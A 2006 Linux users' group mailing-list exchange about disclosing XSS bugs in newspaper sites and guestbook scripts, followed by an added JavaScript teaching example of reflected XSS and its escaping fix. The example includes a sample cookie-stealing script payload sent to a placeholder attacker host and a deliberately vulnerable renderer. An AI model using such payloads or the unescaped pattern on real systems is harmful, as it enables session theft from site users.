[TriLUG] Google and the Triangle? Can this be true?

Russell Jones russ at virante.com
Sun Apr 2 16:36:20 EDT 2006


Yes, I have notified the newspapers, although I have yet to receive a
response. People, for some reason, do not consider XSS to be as serious as
it is. I published an XSS vulnerability on Secunia for a popular guestbook
http://secunia.com/advisories/17159/ because a lot of businesses were
using it. There have been no updates yet. Similarly, I notified a popular
freeware site-search tool of their vulnerabilities; no updates either.

In this case, however, the possibilities are far less heinous. Perhaps it
would be possible for a crafty enough hacker to steal an individual's
login information for their newspaper subscription, but the escalation from
there is not nearly as dangerous as an XSS exploit on a bank or ecommerce
site.

Russ


> Russell Jones wrote:
>
>>I had to do it - did you check out my site http://www.xssfools.com ?
>>
>>
> I trust that you brought the XSS bugs to the attention of the authors of
> the various websites?  There are far more devious and irresponsible
> things to be done with XSS, and your site is essentially providing a
> fast and easy template to exploit known bugs with their websites.
> That's all well and good, imho, if you at least sent an email to the
> appropriate contact emails, and they acknowledged it's a bug and don't
> care.  I'm sure I don't need to point out some of the potentially bad
> things that can be done with XSS, from site cookie stealing to
> attempting to fool the admins into visiting the URL to steal passwords /
> elevated privileges, confidence schemes, email address harvesting (from
> logged in users), etc, etc.
>
> Please, tinker.  But tinker responsibly.
> Aaron S. Joyner


-- 
Russell P. Jones
Chief Information Officer
Virante Incorporated
http://www.virante.com
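The thread talks about XSS in guestbook and site-search scripts and about cookie stealing as one consequence. The following is an added example, not code from either poster and not the vulnerable guestbook or search tool mentioned above: a hypothetical site-search results page rendered with the search term concatenated straight into the markup, beside the escaped form, plus a session-cookie header with HttpOnly set so that document.cookie cannot read the session even if an injection slips through. The attacker host in the payload is a made-up placeholder.

```javascript
// Added example (not from the TriLUG thread): a reflected XSS in a
// hypothetical site-search results page, shown beside its escaped form.

// Minimal HTML escaper covering the five characters that break out of
// text and attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the search term is concatenated into the markup unescaped,
// the pattern behind most reflected XSS in site-search and guestbook code.
function renderResultsVulnerable(query) {
  return `<h2>Results for "${query}"</h2>`;
}

// Hardened: every untrusted value is HTML-escaped before it touches markup.
function renderResultsSafe(query) {
  return `<h2>Results for "${escapeHtml(query)}"</h2>`;
}

// Constructed payload of the kind the thread describes: send the victim's
// cookies to an attacker-controlled host (attacker.example is hypothetical).
const PAYLOAD =
  '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>';

// True if the rendered page still contains a live <script> element.
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Defence in depth on the cookie side: HttpOnly hides the session cookie
// from document.cookie, so a script injection cannot read it; Secure and
// SameSite limit where the browser will send it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

const vulnerable = renderResultsVulnerable(PAYLOAD);
const safe = renderResultsSafe(PAYLOAD);
console.log('vulnerable page runs script:', containsScriptTag(vulnerable)); // true
console.log('escaped page runs script:  ', containsScriptTag(safe));       // false
console.log('Set-Cookie:', sessionCookieHeader('session', 'abc123'));
```

The escaper is the fix for the HTML text context only; a value placed inside a URL, a JavaScript string or a CSS block needs the encoding for that context instead.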